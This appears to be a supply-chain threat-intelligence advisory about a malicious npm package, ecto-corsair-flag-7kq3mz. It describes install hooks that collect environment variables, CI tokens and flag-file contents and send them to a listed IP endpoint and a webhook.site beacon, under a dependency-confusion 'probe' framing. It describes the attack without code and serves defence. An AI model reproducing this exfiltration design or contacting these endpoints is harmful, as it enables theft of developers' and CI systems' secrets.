Supply-chain threat intelligence

Incident detail

criticalnpm·credential theft·osv

Malicious code in ecto-corsair-flag-7kq3mz (npm)

ecto-corsair-flag-7kq3mz

Risk score

92

AI summary

Indexed incident for ecto-corsair-flag-7kq3mz (npm).

Description

Package wires preinstall, install, and postinstall lifecycle hooks to run postinstall.js, which executes unconditionally on npm install. The script collects hostname, cwd, uid, and environment variables matching FLAG/CTF/NPM/REGISTRY/CI/GITHUB/RUNNER, reads candidate flag files, and uses child_process.execSync to recursively grep installer-side directories (/app, /workspace, /challenge, /home/runner/work/repo/repo,.,..,../..) for flag-shaped strings. The collected manifest is base64-encoded and PUT to http://154.57.164.76:30728/api/modules/, with an additional GET beacon to webhook.site/755defab-ea42-4c1f-9804-43ec567439f5. postinstall.js also tests npm_config_registry against /verdaccio/i to detect successful dependency-confusion landings, and the shipped publish-and-arm.sh and README self-describe the package as an 'armed' dependency-confusion probe. Regardless of the CTF/probe framing, installing this package causes unconsented exfiltration of installer environment and filesystem contents to an attacker-controlled IP.

Technical details

Affected versions

=1.0.2=1.0.0=1.0.1

Indicators

  • affected version=1.0.275%
  • affected version=1.0.075%
  • affected version=1.0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents